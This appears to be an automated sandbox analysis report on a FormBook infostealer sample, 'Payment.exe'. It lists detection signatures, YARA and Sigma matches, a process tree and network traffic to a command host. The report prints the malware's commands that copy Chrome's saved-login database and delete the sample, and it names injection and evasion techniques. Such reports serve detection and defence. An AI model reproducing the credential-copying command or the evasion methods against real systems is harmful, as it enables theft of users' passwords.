Analysis Report Payment.exe

Overview

General Information

Sample Name:Payment.exe
MD5:270d6569643f6933dc525835f72d80a8
SHA1:28efd00cbe954d49dc547492d9dabe0f476102e7
SHA256:6cedea888c451f6f61096686be8ba2aeae326f176885d14f4c6c8b6bc56c08a8

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Steal Google chrome login data
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
PE file has nameless sections
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Uses netsh to modify the Windows network and firewall settings
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Payment.exe (PID: 4968 cmdline: 'C:\Users\user\Desktop\Payment.exe' MD5: 270D6569643F6933DC525835F72D80A8)
    • explorer.exe (PID: 2928 cmdline: MD5: E4A81EDDFF8B844D85C8B45354E4144E)
      • netsh.exe (PID: 2280 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
        • cmd.exe (PID: 1536 cmdline: /c del 'C:\Users\user\Desktop\Payment.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 1520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cmd.exe (PID: 4228 cmdline: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x157b9:$sqlite3step: 68 34 1C 7B E1
  • 0x158cc:$sqlite3step: 68 34 1C 7B E1
  • 0x157e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1590d:$sqlite3text: 68 38 2A 90 C5
  • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15923:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7248:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x74b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x12b35:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x12621:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x12c37:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x12daf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x802a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1189c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x89c3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x17ea7:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x18eaa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x157b9:$sqlite3step: 68 34 1C 7B E1
  • 0x158cc:$sqlite3step: 68 34 1C 7B E1
  • 0x157e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1590d:$sqlite3text: 68 38 2A 90 C5
  • 0x157fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15923:$sqlite3blob: 68 53 D8 7F 8C

Sigma Overview

System Summary:

Sigma detected: Steal Google chrome login data
Source: Process started | Author: Joe Security | Data: Command: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Windows\SysWOW64\netsh.exe, ParentImage: C:\Windows\SysWOW64\netsh.exe, ParentProcessId: 2280, ProcessCommandLine: /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V, ProcessId: 4228

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: Payment.exe | Virustotal: Detection: 17%
Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: Payment.exe | Joe Sandbox ML: detected

Source: global traffic | HTTP traffic detected: GET /p9g/?rz=sx1h9zONAUD0SGu6iotbukrmFxqOnGKQjWU3iDvcZZjGUVaPjo7YgUXSXfl2bX+6BwIw&s6=fHwHY HTTP/1.1 | Host: www.biquzhibo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | ASN Name: unknown unknown
Source: global traffic | HTTP traffic detected: GET /p9g/?rz=sx1h9zONAUD0SGu6iotbukrmFxqOnGKQjWU3iDvcZZjGUVaPjo7YgUXSXfl2bX+6BwIw&s6=fHwHY HTTP/1.1 | Host: www.biquzhibo.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: unknown | DNS traffic detected: queries for: www.biquzhibo.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 27 May 2020 18:09:45 GMT | Server: Apache/2.4.39 (Win64) PHP/5.6.40 | Content-Length: 295 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 39 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 39 20 28 57 69 6e 36 34 29 20 50 48 50 2f 35 2e 36 2e 34 30 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 62 69 71 75 7a 68 69 62 6f 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /p9g/ was not found on this server.</p><hr><address>Apache/2.4.39 (Win64) PHP/5.6.40 Server at www.biquzhibo.com Port 80</address></body></html>
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.984584383.0000000007B92000.00000004.00000001.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.986463639.000000000A8D6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

Source: Payment.exe, 00000000.00000002.1006339786.00000000005B0000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Detected FormBook malware
Source: C:\Windows\SysWOW64\netsh.exe | Dropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logri.ini
Source: C:\Windows\SysWOW64\netsh.exe | Dropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logrf.ini
Source: C:\Windows\SysWOW64\netsh.exe | Dropped file: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logrv.ini
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Payment.exe
PE file has nameless sections
Source: Payment.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\Payment.exe | Process Stats: CPU usage > 98%
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A3E0 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A360 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A2D0 NtClose,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A240 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A750 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A700 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A720 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A6A0 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A610 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A5F0 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A540 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A560 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A480 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A4A0 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A410 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A3D0 NtCreateKey
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A350 NtQueryValueKey
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A370 NtQueryInformationProcess
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A310 NtEnumerateValueKey
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A2F0 NtQueryInformationFile
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A260 NtWriteFile
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A220 NtWaitForSingleObject
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9BA30 NtSetContextThread
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9B0B0 NtGetContextThread
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A800 NtSetValueKey
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A780 NtOpenDirectoryObject
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A710 NtQuerySection
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A6D0 NtCreateProcessEx
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A650 NtQueueApcThread
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A5A0 NtWriteVirtualMemory
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9BD40 NtSuspendThread
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A520 NtEnumerateKey
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9ACE0 NtCreateMutant
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A460 NtOpenProcess
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A470 NtSetInformationFile
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9B470 NtOpenThread
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9B410 NtOpenProcessToken
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C9A430 NtQueryVirtualMemory
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_003F86E0
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C863C2
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C5EBE0
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C84B96
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C7FB40
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D222DD
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D21A99
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C742B0
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C84A5B
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D2E214
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D10A02
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C8523D
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D161DF
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D219E2
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C86180
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D2D9BE
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C8594B
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03CA9906
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C87110
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C848CB
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D228E8
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C6A080
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D018B6
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C81070
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D1D016
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C89810
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C8E020
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C80021
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D21FCE
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D12782
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C75790
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D21746
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D226F8
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D13E96
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C77640
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C84E61
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D1CE66
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C85E70
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C86611
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D1D5D2
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D0FDDB
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D01DE3
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03CFE58A
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D1E581
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C50D40
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D11D1B
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D22519
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03CFC53F
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C71530
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D1DCC5
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D144EF
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D13490
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D22C9A
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D21C9F
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C8547E
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C6740C
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03C71410
Source: C:\Users\user\Desktop\Payment.exe | Code function: 0_2_03D0F42B
Source: C:\Users\user\Desktop\Payment.exe | Code function: String function: 03CADDE8 appears 37 times
Source: C:\Users\user\Desktop\Payment.exe | Code function: String function: 03C5B0E0 appears 174 times
Source: Payment.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Payment.exe, 00000000.00000003.1004803327.000000000060E000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenamenetsh.exej% vs Payment.exe
Source: Payment.exe, 00000000.00000002.1009402390.0000000003D4F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe
Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1006564055.00000000009B0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1006754841.0000000000D80000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1008584406.000000000386C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@8/6@2/1
Source: C:\Windows\SysWOW64\netsh.exe | File created: C:\Users\user\AppData\Roaming\0M0Q5-6-
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5016:120:WilError_01
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Local\Temp\DB1
Source: C:\Users\user\Desktop\Payment.exe | Command line argument: Checker1 | 0_2_003F1250
Source: Payment.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe | File read: C:\Users\desktop.ini
Source: C:\Users\user\Desktop\Payment.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\netsh.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Payment.exe | Virustotal: Detection: 17%
Source: C:\Users\user\Desktop\Payment.exe | File read: C:\Users\user\Desktop\Payment.exe
Source: unknown | Process created: C:\Users\user\Desktop\Payment.exe 'C:\Users\user\Desktop\Payment.exe'
Source: unknown | Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment.exe'
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment.exe'
Source: C:\Windows\SysWOW64\netsh.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32
Source: C:\Windows\SysWOW64\netsh.exe | File written: C:\Users\user\AppData\Roaming\0M0Q5-6-\0M0logri.ini
Source: C:\Windows\SysWOW64\netsh.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Payment.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Payment.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wscui.pdbUGP | source: explorer.exe, 00000003.00000000.982549303.0000000007010000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb | source: Payment.exe, 00000000.00000003.1004774628.00000000005F2000.00000004.00000001.sdmp
Source: Binary string: netsh.pdbGCTL | source: Payment.exe, 00000000.00000003.1004774628.00000000005F2000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP | source: Payment.exe, 00000000.00000002.1009402390.0000000003D4F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: Payment.exe
Source: Binary string: C:\Codes\Version11\CHECKER_1\Release\CHECKER_1.pdb | source: Payment.exe
Source: Binary string: wscui.pdb | source: explorer.exe, 00000003.00000000.982549303.0000000007010000.00000002.00000001.sdmp
Source: Payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Payment.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
